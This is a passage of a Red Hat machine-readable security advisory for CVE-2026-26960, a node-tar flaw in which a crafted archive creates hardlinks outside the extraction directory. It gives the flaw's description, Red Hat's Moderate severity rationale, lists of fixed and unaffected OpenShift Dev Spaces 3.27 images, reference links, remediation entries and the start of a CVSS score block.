"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441253"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In Red Hat environments, this condition introduces a significant constraint, as exploitation requires user interaction and reliance on unsafe handling of externally supplied archives. The attack is not remotely exploitable in isolation and depends on a user or service processing attacker-controlled input.\n\nFurthermore, the impact of the vulnerability is limited to the privileges of the extracting process. In typical Red Hat deployments, archive extraction is performed by non-privileged users or within confined environments such as containers or restricted service contexts, which limits the scope of potential damage.\n\nRed Hat analysis also notes that this issue does not provide a direct mechanism for code execution or privilege escalation, but rather enables file system manipulation within the boundaries of the executing user\u2019s permissions.\n\nGiven the requirement for user-assisted exploitation, the absence of a direct remote attack vector, and the confinement of impact to the privileges of the extracting process, Red Hat considers the practical risk to be lower than the generalized NVD assessment. As a result, this vulnerability is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "RHBZ#2441253",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441253"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26960"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384",
"url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f",
"url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"
}
],
"release_date": "2026-02-20T01:07:52.979000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
